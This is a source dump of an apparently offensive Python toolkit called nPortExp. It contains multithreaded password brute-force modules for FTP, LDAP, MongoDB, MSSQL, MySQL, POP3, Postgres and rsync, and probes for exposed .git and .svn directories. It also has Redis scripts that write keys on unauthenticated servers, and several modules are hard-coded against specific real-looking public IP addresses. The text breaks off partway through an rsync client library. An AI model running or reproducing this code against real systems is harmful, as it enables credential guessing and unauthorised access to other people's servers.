├── Exp ├── __init__.py ├── ftp │ └── ftp.py ├── http │ ├── __init__.py │ ├── __pycache__ │ │ ├── gitInfo.cpython-34.pyc │ │ └── svnInfo.cpython-34.pyc │ ├── gitInfo.py │ └── svnInfo.py ├── ldapd │ └── ldapd.py ├── mongodb │ └── mongodb.py ├── ms-sql-s │ ├── __init__.py │ ├── __pycache__ │ │ ├── ms-sql-s-brust.cpython-34.pyc │ │ └── mssql_brust.cpython-34.pyc │ └── ms-sql-s-brust.py ├── mssql │ └── mssql_brust.py ├── mysql │ ├── __init__.py │ ├── __pycache__ │ │ └── mysql_brust.cpython-34.pyc │ └── mysql_brust.py ├── pop3 │ └── pop3.py ├── postgres │ └── postgres.py ├── redis │ ├── __init__.py │ ├── redis_brust.py │ └── redis_unAuthorized.py ├── rsync │ ├── rsync.py │ └── rsynclib.py ├── smb │ └── smb.py ├── smtp │ └── __init__.py ├── snmp │ └── snmp.py ├── ssh │ └── ssh.py ├── ssl │ └── ssltest.py └── vnc │ ├── vnc.py │ └── vnclib.py ├── Libs ├── __init__.py ├── __pycache__ │ ├── __init__.cpython-34.pyc │ ├── glo.cpython-34.pyc │ ├── methods.cpython-34.pyc │ ├── nmapPortScan.cpython-34.pyc │ └── plugins.cpython-34.pyc ├── glo.py ├── methods.py ├── nmapPortScan.py ├── plugins.py └── rules.py ├── __init__.py ├── demo.py ├── demo2.py ├── logger.txt ├── password ├── __init__.py ├── ftp.txt ├── http.txt ├── ldapd.txt ├── mongodb.txt ├── ms-sql-s.txt ├── mysql.txt ├── pop3.txt ├── postgres.txt ├── rsync.txt ├── smb.txt ├── snmp.txt ├── ssh.txt ├── tomcat.txt └── vnc.txt ├── readme.md ├── scan.py └── setting.py /Exp/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Exp/__init__.py -------------------------------------------------------------------------------- /Exp/ftp/ftp.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import time 3 | import threading 4 | from multiprocessing.dummy import Pool 5 | from printers import printPink,printGreen 6 | from ftplib import FTP 7 | 8 | 9 | class ftp_burp(object): 10 | 11 | def __init__(self,c): 12 | self.config=c 13 | self.lock=threading.Lock() 14 | self.result=[] 15 | self.lines=self.config.file2list("conf/ftp.conf") 16 | 17 | 18 | def ftp_connect(self,ip,username,password,port): 19 | crack=0 20 | try: 21 | ftp=FTP() 22 | ftp.connect(ip,str(port)) 23 | ftp.login(user=username,passwd=password) 24 | crack=1 25 | ftp.close() 26 | except Exception,e: 27 | self.lock.acquire() 28 | print "%s ftp service 's %s:%s login fail " %(ip,username,password) 29 | self.lock.release() 30 | return crack 31 | 32 | 33 | def ftp_l(self,ip,port): 34 | try: 35 | for data in self.lines: 36 | username=data.split(':')[0] 37 | password=data.split(':')[1] 38 | if self.ftp_connect(ip,username,password,port)==1: 39 | self.lock.acquire() 40 | printGreen("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 41 | self.result.append("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 42 | self.lock.release() 43 | break 44 | except Exception,e: 45 | pass 46 | 47 | def run(self,ipdict,pinglist,threads,file): 48 | if len(ipdict['ftp']): 49 | printPink("crack ftp now...") 50 | print "[*] start crack ftp %s" % time.ctime() 51 | starttime=time.time() 52 | 53 | pool=Pool(threads) 54 | 55 | for ip in ipdict['ftp']: 56 | pool.apply_async(func=self.ftp_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) 57 | pool.close() 58 | pool.join() 59 | 60 | print "[*] stop ftp serice %s" % time.ctime() 61 | print "[*] crack ftp done,it has Elapsed time:%s " % (time.time()-starttime) 62 | 63 | for i in xrange(len(self.result)): 64 | self.config.write_file(contents=self.result[i],file=file) 65 | 66 | 67 | if __name__ == '__main__': 68 | import sys 69 | sys.path.append("../") 70 | from comm.config import * 71 | c=config() 72 | ipdict={'ftp': ['192.168.1.1:21']} 73 | pinglist=['192.168.1.1'] 74 | test=ftp_burp(c) 75 | test.run(ipdict,pinglist,50,file="../result/test") 76 | 77 | -------------------------------------------------------------------------------- /Exp/http/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Exp/http/__init__.py -------------------------------------------------------------------------------- /Exp/http/__pycache__/gitInfo.cpython-34.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Exp/http/__pycache__/gitInfo.cpython-34.pyc -------------------------------------------------------------------------------- /Exp/http/__pycache__/svnInfo.cpython-34.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Exp/http/__pycache__/svnInfo.cpython-34.pyc -------------------------------------------------------------------------------- /Exp/http/gitInfo.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import requests 3 | import re 4 | from Libs.glo import * 5 | logger = get_value('logger') 6 | 7 | class Exploit: 8 | def __init__(self, ip, port): 9 | self.ip = ip 10 | self.port = port 11 | 12 | # 加载 13 | def launch(self): 14 | try: 15 | url = 'http://{}:{}/.git/HEAD'.format(self.ip, self.port) 16 | logger.info('[test] {}'.format(url)) 17 | self.attack(url) 18 | except Exception as e: 19 | ret = '[not exist git]' 20 | logger.error(ret) 21 | 22 | def attack(self, url): 23 | req = requests.get(url, timeout=10) 24 | if req.status_code == 200 and re.search(r'ref: refs/heads/', req.text): 25 | ret = '[+] {} --> git'.format(url) 26 | else: 27 | ret = '[not exist git]' 28 | logger.info(ret) 29 | 30 | # print(Exploit(r'sh.grfy.net', 443).launch()) -------------------------------------------------------------------------------- /Exp/http/svnInfo.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import requests 3 | from Libs.glo import * 4 | logger = get_value('logger') 5 | 6 | class Exploit: 7 | def __init__(self, ip, port): 8 | self.ip = ip 9 | self.port = port 10 | 11 | # 加载 12 | def launch(self): 13 | try: 14 | url = 'http://{}:{}/.svn/entries'.format(self.ip, self.port) 15 | logger.info('[test] {}'.format(url)) 16 | self.attack(url) 17 | except Exception as e: 18 | ret = '[not exist svn]' 19 | logger.error(ret) 20 | 21 | def attack(self, url): 22 | req = requests.get(url, timeout=10) 23 | if req.status_code != 200: 24 | ret = '[not exist svn]' 25 | elif req.headers.get("Content-Type") == "application/octet-stream": 26 | ret = '[+] {} --> svn'.format(url) 27 | else: 28 | ret = '[not exist svn]' 29 | logger.info(ret) 30 | 31 | # print(Exploit(r'www.ttrar.com', 80).launch()) 32 | -------------------------------------------------------------------------------- /Exp/ldapd/ldapd.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import time 3 | import threading 4 | from printers import printPink,printGreen 5 | from multiprocessing.dummy import Pool 6 | import ldap 7 | 8 | class ldap_burp(object): 9 | 10 | def __init__(self,c): 11 | self.config=c 12 | self.lock=threading.Lock() 13 | self.result=[] 14 | self.lines=self.config.file2list("conf/ldapd.conf") 15 | 16 | 17 | def ldap_connect(self,ip,username,password,port): 18 | creak=0 19 | try: 20 | ldappath='ldap://'+ip+':'+port+'/' 21 | l = ldap.initialize(ldappath) 22 | re=l.simple_bind(username,password) 23 | if re==1: 24 | creak=1 25 | except Exception,e: 26 | if e[0]['desc']=="Can't contact LDAP server": 27 | creak=2 28 | pass 29 | return creak 30 | 31 | def ldap_creak(self,ip,port): 32 | try: 33 | for data in self.lines: 34 | username=data.split(':')[0] 35 | password=data.split(':')[1] 36 | flag=self.ldap_connect(ip,username,password,port) 37 | if flag==2: 38 | self.lock.acquire() 39 | printGreen("%s ldap at %s can't connect\r\n" %(ip,port)) 40 | self.lock.release() 41 | break 42 | 43 | if flag==1: 44 | self.lock.acquire() 45 | printGreen("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 46 | self.result.append("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 47 | self.lock.release() 48 | break 49 | else: 50 | self.lock.acquire() 51 | print "%s ldap service 's %s:%s login fail " %(ip,username,password) 52 | self.lock.release() 53 | except Exception,e: 54 | pass 55 | 56 | 57 | def run(self,ipdict,pinglist,threads,file): 58 | if len(ipdict['ldap']): 59 | printPink("crack ldap now...") 60 | print "[*] start ldap %s" % time.ctime() 61 | starttime=time.time() 62 | 63 | pool=Pool(threads) 64 | 65 | for ip in ipdict['ldap']: 66 | pool.apply_async(func=self.ldap_creak,args=(str(ip).split(':')[0],str(ip).split(':')[1])) 67 | pool.close() 68 | pool.join() 69 | 70 | print "[*] stop ldap serice %s" % time.ctime() 71 | print "[*] crack ldap done,it has Elapsed time:%s " % (time.time()-starttime) 72 | 73 | for i in xrange(len(self.result)): 74 | self.config.write_file(contents=self.result[i],file=file) 75 | 76 | if __name__ == '__main__': 77 | import sys 78 | sys.path.append("../") 79 | from comm.config import * 80 | c=config() 81 | ipdict={'ldap': ['124.172.223.236:389']} 82 | pinglist=['192.168.1.1'] 83 | test=ldap_burp(c) 84 | test.run(ipdict,pinglist,50,file="../result/test") 85 | 86 | 87 | -------------------------------------------------------------------------------- /Exp/mongodb/mongodb.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import time 3 | import threading 4 | from printers import printPink,printRed,printGreen 5 | from multiprocessing.dummy import Pool 6 | import pymongo 7 | 8 | 9 | class mongodb_burp(object): 10 | 11 | def __init__(self,c): 12 | self.config=c 13 | self.lock=threading.Lock() 14 | self.result=[] 15 | self.lines=self.config.file2list("conf/mongodb.conf") 16 | 17 | 18 | def mongoDB_connect(self,ip,username,password,port): 19 | crack=0 20 | try: 21 | connection=pymongo.Connection(ip,port) 22 | db=connection.admin 23 | db.collection_names() 24 | self.lock.acquire() 25 | printRed('%s mongodb service at %s allow login Anonymous login!!\r\n' %(ip,port)) 26 | self.result.append('%s mongodb service at %s allow login Anonymous login!!\r\n' %(ip,port)) 27 | self.lock.release() 28 | crack=1 29 | 30 | except Exception,e: 31 | if e[0]=='database error: not authorized for query on admin.system.namespaces': 32 | try: 33 | r=db.authenticate(username,password) 34 | if r!=False: 35 | crack=2 36 | else: 37 | self.lock.acquire() 38 | crack=3 39 | print "%s mongodb service 's %s:%s login fail " %(ip,username,password) 40 | self.lock.release() 41 | except Exception,e: 42 | pass 43 | 44 | else: 45 | printRed('%s mongodb service at %s not connect' %(ip,port)) 46 | crack=4 47 | return crack 48 | 49 | 50 | 51 | def mongoDB(self,ip,port): 52 | try: 53 | for data in self.lines: 54 | username=data.split(':')[0] 55 | password=data.split(':')[1] 56 | flag=self.mongoDB_connect(ip,username,password,port) 57 | if flag in [1,4]: 58 | break 59 | 60 | if flag==2: 61 | self.lock.acquire() 62 | printGreen("%s mongoDB at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 63 | self.result.append("%s mongoDB at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 64 | self.lock.release() 65 | break 66 | except Exception,e: 67 | pass 68 | 69 | 70 | def run(self,ipdict,pinglist,threads,file): 71 | if len(ipdict['mongodb']): 72 | printPink("crack mongodb now...") 73 | print "[*] start crack mongodb %s" % time.ctime() 74 | starttime=time.time() 75 | 76 | pool=Pool(threads) 77 | 78 | for ip in ipdict['mongodb']: 79 | pool.apply_async(func=self.mongoDB,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) 80 | 81 | pool.close() 82 | pool.join() 83 | print "[*] stop mongoDB serice %s" % time.ctime() 84 | print "[*] crack mongoDB done,it has Elapsed time:%s " % (time.time()-starttime) 85 | 86 | for i in xrange(len(self.result)): 87 | self.config.write_file(contents=self.result[i],file=file) 88 | 89 | 90 | if __name__ == '__main__': 91 | import sys 92 | sys.path.append("../") 93 | from comm.config import * 94 | c=config() 95 | ipdict={'mongodb': ['112.90.23.158:27017']} 96 | pinglist=['192.168.1.1'] 97 | test=mongodb_burp(c) 98 | test.run(ipdict,pinglist,50,file="../result/test") 99 | 100 | 101 | 102 | -------------------------------------------------------------------------------- /Exp/ms-sql-s/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Exp/ms-sql-s/__init__.py -------------------------------------------------------------------------------- /Exp/ms-sql-s/__pycache__/ms-sql-s-brust.cpython-34.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Exp/ms-sql-s/__pycache__/ms-sql-s-brust.cpython-34.pyc -------------------------------------------------------------------------------- /Exp/ms-sql-s/__pycache__/mssql_brust.cpython-34.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Exp/ms-sql-s/__pycache__/mssql_brust.cpython-34.pyc -------------------------------------------------------------------------------- /Exp/ms-sql-s/ms-sql-s-brust.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import pymssql 3 | import threading 4 | from Libs.methods import * 5 | from Libs.glo import * 6 | 7 | event = getThrEvent() # 获取线程事件 8 | event.set() 9 | q = getQueue() #队列必须使用多进程的队列,使用queue模块会报错 10 | 11 | #自定义多线程类 12 | class Exploit(threading.Thread): 13 | def __init__(self, ip, port, q_pwdCopy): 14 | threading.Thread.__init__(self) 15 | self.ip = ip 16 | self.port = port 17 | self.q_pwdCopy = q_pwdCopy # 获取密码 18 | 19 | def run(self): 20 | while event.is_set(): 21 | if self.q_pwdCopy.empty(): 22 | break 23 | else: 24 | pwd = self.q_pwdCopy.get() 25 | try: 26 | pymssql.connect(server=self.ip, user='sa', password=pwd, port=self.port, login_timeout=5) 27 | logger.info('[+] [{}:{} --> u:{} p:{}]'.format(self.ip, self.port, 'root', pwd)) 28 | break 29 | except Exception as e: 30 | logger.info('[-] [{}:{} --> u:{} p:{}]'.format(self.ip, self.port, 'root', pwd)) 31 | -------------------------------------------------------------------------------- /Exp/mssql/mssql_brust.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import pymssql 3 | import threading 4 | from Libs.methods import * 5 | from Libs.glo import * 6 | 7 | event = getThrEvent() # 获取线程事件 8 | event.set() 9 | q = getQueue() #队列必须使用多进程的队列,使用queue模块会报错 10 | 11 | #自定义多线程类 12 | class Exploit(threading.Thread): 13 | def __init__(self, ip, port, q_pwdCopy): 14 | threading.Thread.__init__(self) 15 | self.ip = ip 16 | self.port = port 17 | self.q_pwdCopy = q_pwdCopy # 获取密码 18 | 19 | def run(self): 20 | while event.is_set(): 21 | if self.q_pwdCopy.empty(): 22 | break 23 | else: 24 | pwd = self.q_pwdCopy.get() 25 | try: 26 | pymssql.connect(server=self.ip, user='sa', password=pwd, port=self.port, login_timeout=5) 27 | logger.info('[+] [{}:{} --> u:{} p:{}]'.format(self.ip, self.port, 'root', pwd)) 28 | break 29 | except Exception as e: 30 | logger.info('[-] [{}:{} --> u:{} p:{}]'.format(self.ip, self.port, 'root', pwd)) 31 | -------------------------------------------------------------------------------- /Exp/mysql/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Exp/mysql/__init__.py -------------------------------------------------------------------------------- /Exp/mysql/__pycache__/mysql_brust.cpython-34.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Exp/mysql/__pycache__/mysql_brust.cpython-34.pyc -------------------------------------------------------------------------------- /Exp/mysql/mysql_brust.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import MySQLdb 3 | import threading 4 | from Libs.methods import * 5 | from Libs.glo import * 6 | 7 | event = getThrEvent() # 获取线程事件 8 | event.set() 9 | q = getQueue() #队列必须使用多进程的队列,使用queue模块会报错 10 | 11 | #自定义多线程类 12 | class Exploit(threading.Thread): 13 | def __init__(self, ip, port, q_pwdCopy): 14 | threading.Thread.__init__(self) 15 | self.ip = ip 16 | self.port = port 17 | self.q_pwdCopy = q_pwdCopy # 获取密码 18 | 19 | def run(self): 20 | while event.is_set(): 21 | if self.q_pwdCopy.empty(): 22 | break 23 | else: 24 | pwd = self.q_pwdCopy.get() 25 | try: 26 | MySQLdb.connect(host=self.ip, user='root', passwd=pwd, port=self.port, connect_timeout=5) 27 | logger.info('[+] [{}:{} --> u:{} p:{}]'.format(self.ip, self.port, 'root', pwd)) 28 | break 29 | except Exception as e: 30 | logger.info('[-] [{}:{} --> u:{} p:{}]'.format(self.ip, self.port, 'root', pwd)) 31 | -------------------------------------------------------------------------------- /Exp/pop3/pop3.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import time 3 | from printers import printPink,printGreen 4 | import threading 5 | from multiprocessing.dummy import Pool 6 | import poplib 7 | 8 | def pop3_Connection(ip,username,password,port): 9 | try: 10 | pp = poplib.POP3(ip) 11 | #pp.set_debuglevel(1) 12 | pp.user(username) 13 | pp.pass_(password) 14 | (mailCount,size) = pp.stat() 15 | pp.quit() 16 | if mailCount: 17 | lock.acquire() 18 | printGreen("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 19 | result.append("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 20 | lock.release() 21 | except Exception,e: 22 | print e 23 | lock.acquire() 24 | print "%s pop3 service 's %s:%s login fail " %(ip,username,password) 25 | lock.release() 26 | pass 27 | 28 | def pop3_l(ip,port): 29 | try: 30 | d=open('conf/pop3.conf','r') 31 | data=d.readline().strip('\r\n') 32 | while(data): 33 | username=data.split(':')[0] 34 | password=data.split(':')[1] 35 | pop3_Connection(ip,username,password,port) 36 | data=d.readline().strip('\r\n') 37 | except Exception,e: 38 | print e 39 | pass 40 | 41 | def pop_main(ipdict,threads): 42 | printPink("crack pop now...") 43 | print "[*] start crack pop %s" % time.ctime() 44 | starttime=time.time() 45 | 46 | global lock 47 | lock = threading.Lock() 48 | global result 49 | result=[] 50 | 51 | pool=Pool(threads) 52 | 53 | for ip in ipdict['pop3']: 54 | pool.apply_async(func=pop3_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) 55 | 56 | pool.close() 57 | pool.join() 58 | 59 | print "[*] stop pop serice %s" % time.ctime() 60 | print "[*] crack pop done,it has Elapsed time:%s " % (time.time()-starttime) 61 | return result -------------------------------------------------------------------------------- /Exp/postgres/postgres.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import time 3 | import threading 4 | from printers import printPink,printGreen 5 | from multiprocessing.dummy import Pool 6 | import psycopg2 7 | import re 8 | 9 | 10 | def postgres_connect(ip,username,password,port): 11 | crack =0 12 | try: 13 | db=psycopg2.connect(user=username, password=password, host=ip, port=port) 14 | if db: 15 | crack=1 16 | db.close() 17 | except Exception, e: 18 | if re.findall(".*Password.*",e[0]): 19 | lock.acquire() 20 | print "%s postgres's %s:%s login fail" %(ip,username,password) 21 | lock.release() 22 | crack=2 23 | else: 24 | lock.acquire() 25 | print "connect %s postgres service at %s login fail " %(ip,port) 26 | lock.release() 27 | crack=3 28 | pass 29 | return crack 30 | 31 | def postgreS(ip,port): 32 | try: 33 | d=open('conf/postgres.conf','r') 34 | data=d.readline().strip('\r\n') 35 | while(data): 36 | username=data.split(':')[0] 37 | password=data.split(':')[1] 38 | flag=postgres_connect(ip,username,password,port) 39 | time.sleep(0.1) 40 | if flag==3: 41 | break 42 | 43 | if flag==1: 44 | lock.acquire() 45 | printGreen("%s postgres at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 46 | result.append("%s postgres at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 47 | lock.release() 48 | break 49 | data=d.readline().strip('\r\n') 50 | except Exception,e: 51 | print e 52 | pass 53 | 54 | def postgres_main(ipdict,threads): 55 | printPink("crack postgres now...") 56 | print "[*] start postgres %s" % time.ctime() 57 | starttime=time.time() 58 | 59 | global lock 60 | lock = threading.Lock() 61 | global result 62 | result=[] 63 | 64 | pool=Pool(threads) 65 | 66 | for ip in ipdict['postgres']: 67 | pool.apply_async(func=postgreS,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) 68 | 69 | pool.close() 70 | pool.join() 71 | print "[*] stop crack postgres %s" % time.ctime() 72 | print "[*] crack postgres done,it has Elapsed time:%s " % (time.time()-starttime) 73 | return result -------------------------------------------------------------------------------- /Exp/redis/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Exp/redis/__init__.py -------------------------------------------------------------------------------- /Exp/redis/redis_brust.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | ''' 3 | 如果redis没设置密码,r.set('name', 'test')可以成功设置,通过r.get('name')可以取出 4 | 如果设置了密码,不传递password则返回NOAUTH Authentication required. 5 | 传递密码但错误返回invalid password 6 | 密码正确成功写入值 7 | 149.28.42.95 有密码 8 | 207.246.87.203 无密码 9 | ''' 10 | # coding:utf-8 11 | import redis 12 | # import threading 13 | # from Libs.methods import * 14 | # from Libs.glo import * 15 | # 16 | # event = getThrEvent() # 获取线程事件 17 | # event.set() 18 | # q = getQueue() #队列必须使用多进程的队列,使用queue模块会报错 19 | # 20 | # #自定义多线程类 21 | # class Exploit(threading.Thread): 22 | # def __init__(self, ip, port, q_pwd): 23 | # threading.Thread.__init__(self) 24 | # self.ip = ip 25 | # self.port = port 26 | # self.q_pwd = q_pwd # 获取密码 27 | # 28 | # def run(self): 29 | # while event.is_set(): 30 | # if self.q_pwd.empty(): 31 | # break 32 | # else: 33 | # pwd = self.q_pwd.get() 34 | # try: 35 | # r = redis.Redis(host=ip, port=6379) 36 | # r.set('name', 'test') 37 | # break 38 | # except Exception as e: 39 | # flag = 1 40 | # while flag: 41 | # for pwd in passwords: 42 | # try: 43 | # r = redis.Redis(host=ip, port=6379, password=pwd) 44 | # r.set('name', 'test') 45 | # print(pwd) 46 | # flag = 0 47 | # break 48 | # except Exception as e: 49 | # print(e) 50 | # flag = 0 51 | 52 | 53 | 54 | ip = '207.246.87.203' 55 | passwords = ['a', 'b', '123456', '789'] 56 | try: 57 | r = redis.Redis(host=ip, port=6379) 58 | r.set('name', 'test') 59 | print(r.get('name')) 60 | except Exception as e: 61 | flag = 1 62 | while flag: 63 | for pwd in passwords: 64 | try: 65 | r = redis.Redis(host=ip, port=6379, password=pwd) 66 | r.set('name', 'test') 67 | print(pwd) 68 | flag = 0 69 | break 70 | except Exception as e: 71 | print(e) 72 | flag = 0 -------------------------------------------------------------------------------- /Exp/redis/redis_unAuthorized.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | # 未授权 3 | import redis 4 | r = redis.Redis(host='149.28.42.95', port=6379) 5 | r.set('name', 'test') 6 | print(r.get('name')) -------------------------------------------------------------------------------- /Exp/rsync/rsync.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import threading 3 | from printers import printPink,printRed,printGreen 4 | from multiprocessing.dummy import Pool 5 | from Queue import Queue 6 | import re 7 | import time 8 | import threading 9 | from threading import Thread 10 | from rsynclib import * 11 | 12 | class rsync_burp(object): 13 | 14 | def __init__(self,c): 15 | self.config=c 16 | self.lock=threading.Lock() 17 | self.result=[] 18 | self.lines=self.config.file2list("conf/rsync.conf") 19 | self.sp=Queue() 20 | 21 | def get_ver(self,host): 22 | debugging = 0 23 | r = rsync(host) 24 | r.set_debuglevel(debugging) 25 | return r.server_protocol_version 26 | 27 | 28 | def rsync_connect(self,ip,username,password,port): 29 | creak=0 30 | try: 31 | ver=self.get_ver(ip)# get rsync moudle 32 | fp = socket.create_connection((ip, port), timeout=8) 33 | fp.recv(99) 34 | 35 | fp.sendall(ver.strip('\r\n')+'\n') 36 | time.sleep(3) 37 | fp.sendall('\n') 38 | resp = fp.recv(99) 39 | 40 | modules = [] 41 | for line in resp.split('\n'): 42 | modulename = line[:line.find(' ')] 43 | if modulename: 44 | if modulename !='@RSYNCD:': 45 | modules.append(modulename) 46 | 47 | if len(modules)!=0: 48 | for modulename in modules: 49 | self.lock.acquire() 50 | print "find %s module in %s at %s" %(modulename,ip,port) 51 | self.lock.release() 52 | 53 | rs = rsync(ip) 54 | res = rs.login(module=modulename,user=username,passwd=password) 55 | if re.findall('.*OK.*',res): 56 | rs.close() 57 | creak=1 58 | if re.findall('.*Unknown.*',res): 59 | creak=2 60 | else: 61 | creak=3 62 | 63 | except Exception,e: 64 | pass 65 | return creak 66 | 67 | 68 | def rsync_creak(self,ip,port): 69 | try: 70 | for data in self.lines: 71 | username=data.split(':')[0] 72 | password=data.split(':')[1] 73 | flag=self.rsync_connect(ip,username,password,port) 74 | 75 | if flag==3: 76 | self.lock.acquire() 77 | printRed("fail!!bacaues can't find any module\r\n") 78 | self.lock.release() 79 | break 80 | 81 | if flag==2: 82 | self.lock.acquire() 83 | printRed("fail!!bacaues modulename is error\r\n") 84 | self.lock.release() 85 | break 86 | 87 | if flag==1: 88 | self.lock.acquire() 89 | printGreen("%s rsync at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 90 | self.result.append("%s rsync at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 91 | self.lock.release() 92 | break 93 | else: 94 | self.lock.acquire() 95 | print "%s rsync service 's %s:%s login fail " %(ip,username,password) 96 | self.lock.release() 97 | except Exception,e: 98 | print e 99 | 100 | 101 | def run(self,ipdict,pinglist,threads,file): 102 | if len(ipdict['rsync']): 103 | printPink("crack rsync now...") 104 | print "[*] start crack rsync %s" % time.ctime() 105 | starttime=time.time() 106 | 107 | pool=Pool(threads) 108 | 109 | for ip in ipdict['rsync']: 110 | pool.apply_async(func=self.rsync_creak,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) 111 | pool.close() 112 | pool.join() 113 | 114 | print "[*] stop rsync serice %s" % time.ctime() 115 | print "[*] crack rsync done,it has Elapsed time:%s " % (time.time()-starttime) 116 | 117 | for i in xrange(len(self.result)): 118 | self.config.write_file(contents=self.result[i],file=file) 119 | 120 | 121 | if __name__ == '__main__': 122 | import sys 123 | sys.path.append("../") 124 | from comm.config import * 125 | c=config() 126 | ipdict={'rsync': ['101.201.177.35:6379']} 127 | pinglist=['101.201.177.35'] 128 | test=redis_burp(c) 129 | test.run(ipdict,pinglist,50,file="../result/test") 130 | 131 | -------------------------------------------------------------------------------- /Exp/rsync/rsynclib.py: -------------------------------------------------------------------------------- 1 | import base64 2 | try: 3 | import hashlib 4 | hash_md4 = hashlib.new("md4") 5 | hash_md5 = hashlib.md5() 6 | except ImportError: 7 | # for Python << 2.5 8 | import md4 9 | import md5 10 | hash_md4 = md4.new() 11 | hash_md5 = md5.new() 12 | 13 | # Import SOCKS module if it exists, else standard socket module socket 14 | try: 15 | import SOCKS; socket = SOCKS; del SOCKS # import SOCKS as socket 16 | from socket import getfqdn; socket.getfqdn = getfqdn; del getfqdn 17 | except ImportError: 18 | import socket 19 | from socket import _GLOBAL_DEFAULT_TIMEOUT 20 | 21 | __all__ = ["rsync"] 22 | 23 | 24 | 25 | # The standard rsync server control port 26 | RSYNC_PORT = 873 27 | # The sizehint parameter passed to readline() calls 28 | MAXLINE = 8192 29 | protocol_version = 0 30 | 31 | # Exception raised when an error or invalid response is received 32 | class Error(Exception): pass 33 | 34 | # All exceptions (hopefully) that may be raised here and that aren't 35 | # (always) programming errors on our side 36 | all_errors = (Error, IOError, EOFError) 37 | 38 | 39 | # Line terminators for rsync 40 | CRLF = '\r\n' 41 | LF = '\n' 42 | 43 | # The class itself 44 | class rsync: 45 | '''An rsync client class. 46 | 47 | To create a connection, call the class using these arguments: 48 | host, module, user, passwd 49 | 50 | All arguments are strings, and have default value ''. 51 | Then use self.connect() with optional host and port argument. 52 | ''' 53 | debugging = 0 54 | host = '' 55 | port = RSYNC_PORT 56 | maxline = MAXLINE 57 | sock = None 58 | file = None 59 | server_protocol_version = None 60 | 61 | # Initialization method (called by class instantiation). 62 | # Initialize host to localhost, port to standard rsync port 63 | # Optional arguments are host (for connect()), 64 | # and module, user, passwd (for login()) 65 | def __init__(self, host='', module='', user='', passwd='',port=873, 66 | timeout=_GLOBAL_DEFAULT_TIMEOUT): 67 | self.timeout = timeout 68 | if host: 69 | self.connect(host) 70 | if module and user and passwd: 71 | self.login(module, user, passwd) 72 | 73 | def connect(self, host='', port=0, timeout=-999): 74 | '''Connect to host. Arguments are: 75 | - host: hostname to connect to (string, default previous host) 76 | - port: port to connect to (integer, default previous port) 77 | ''' 78 | if host != '': 79 | self.host = host 80 | if port > 0: 81 | self.port = port 82 | if timeout != -999: 83 | self.timeout = timeout 84 | self.sock = socket.create_connection((self.host, self.port), self.timeout) 85 | self.af = self.sock.family 86 | self.file = self.sock.makefile('rb') 87 | self.server_protocol_version = self.getresp() 88 | self.protocol_version = self.server_protocol_version[-2:] 89 | return self.server_protocol_version 90 | 91 | 92 | def set_debuglevel(self, level): 93 | '''Set the debugging level. 94 | The required argument level means: 95 | 0: no debugging output (default) 96 | 1: print commands and responses but not body text etc. 97 | ''' 98 | self.debugging = level 99 | debug = set_debuglevel 100 | 101 | # Internal: send one line to the server, appending LF 102 | def putline(self, line): 103 | line = line + LF 104 | if self.debugging > 1: print '*put*', line 105 | self.sock.sendall(line) 106 | 107 | # Internal: return one line from the server, stripping LF. 108 | # Raise EOFError if the connection is closed 109 | def getline(self): 110 | line = self.file.readline(self.maxline + 1) 111 | if len(line) > self.maxline: 112 | raise Error("got more than %d bytes" % self.maxline) 113 | if self.debugging > 1: 114 | print '*get*', line 115 | if not line: raise 